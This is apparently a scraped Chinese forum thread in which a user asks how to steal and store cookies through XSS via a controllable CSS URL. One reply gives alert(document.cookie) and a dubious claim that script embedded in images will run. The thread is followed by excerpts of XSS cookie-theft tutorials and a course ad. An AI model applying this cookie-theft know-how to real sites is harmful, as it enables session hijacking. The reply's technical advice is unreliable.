XSS 获取并存储cookie的问题

sinat_35367210 2016-06-20 12:07:35

某网页存在语句background-image: url(http://a.com);
括号内的网址可控，怎么获取并存储cookie呢

...全文

627 1 打赏收藏转发到动态举报

写回复

1 条回复

切换为时间正序

请发表友善的回复…

发表回复

zhangsheng_1992 2016-06-20

打赏
举报

回复

最简单的图片攻击把js代码写入图片里面


alert(document.cookie)

尽量写进图片的content里面以便执行

饼干窃取者这个存储库只是一个例子，如何通过 xss 获取 cookie 以用于教育目的。免责声明我对您的行为不承担任何责任。此处提供的代码仅用于教育目的。如果您发现一个带有代码注入漏洞的网站，请通知他们。怎么跑简单地说，您必须输入以下命令： # To install dependencies npm install # To run the servers npm run server 将运行两台服务器：受害者服务器（在端口 8000）攻击者服务器（端口 3000）受害服务器上所有用户的 cookie 都将在攻击者服务器上重定向。该XSS脚本的特殊之处在于，它不会每次都发送cookie，而仅在cookie更新时发送。这可以保护攻击者服务器免受存储溢出的影响。

目录环境搭建盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞，也知道xss是可以盗取cookie的，但是至于怎么盗取cookie其实很多同学可能还不是很清楚，也可能并没有实质性的去探讨过这个问题。环境搭建思路：攻击者本地搭建的一个网站存在xss漏洞，并且在与网站同一个ip的服务器中使用浏览器进行了登录，此时访问了一个恶意链接，这个恶意链接，直接将cookie获取并发送到hacker服务

课程声明：该课程是教学使用，视频内涉及漏洞利用方法，请勿在互联网环境中使用；维护互联网安全，人人有责。课程说明：课程为CISP-PTE子课程。课程目标：让开发工程师、运维工程师、安全工程师迅速构建XSS漏洞的知识体系实验所需环境：vmware；kali虚拟机一台；windows server一台；下载地址在课程资料中。课程主要解决问题： 1、搞明白什么是XSS，XSS有几个分类，分类的依据是什么？ 2、XSS能做什么事情？通过实验学习盗cookie、点击劫持、获取目标主机信息、键盘记录器、内网探测、 XSS-DDoS等等 3、搞明白XSS的漏洞代码到底是什么样？逐行读代码让你看透XSS。 4、XSS如何绕过？近20种绕过方式让你酣畅淋漓。 5、搞懂XSS的防御方法，不同种类的XSS防御有什么区别？如果有以上困惑，赶紧学习吧。Margin老师工作日一般都是30分钟就能为你解答疑惑。

一：存储型XSS 1.保存用户cookie 我们可以通过JS，构造一个请求，来请求一个我们有权限的页面，在构造请求的时候，把用户的cookie当作参数传过去，然后我们就可以在这个页面里，接收传过来的参数，然后再保存起来。所以首先需要写一个接收cookie的页面，它能够接收某个参数，然后保存起来。页面写好保存在c:\wamp\www\xss\的目录下，recv_cookies.php这个文件就是用来接收cookie并保存的，源码如下： 2.构造语句 <script>document.write(

XSS：反射型XSS,存储型XSS，Dom型XSS，如何获取cookie,XSS钓鱼，XSS获取键盘记录一、跨站脚本漏洞（XSS） XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发生在web前端的漏洞，主要危害前端用户 XSS可以通过进行钓鱼攻击，前端js挖矿，用户cookie获取，甚至结合浏览器自身漏洞对主机进行远程控制等攻击流程图：危害：存储型>反射型>D...

21,887

社区成员

140,363

社区内容

发帖

与我相关

我的任务

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章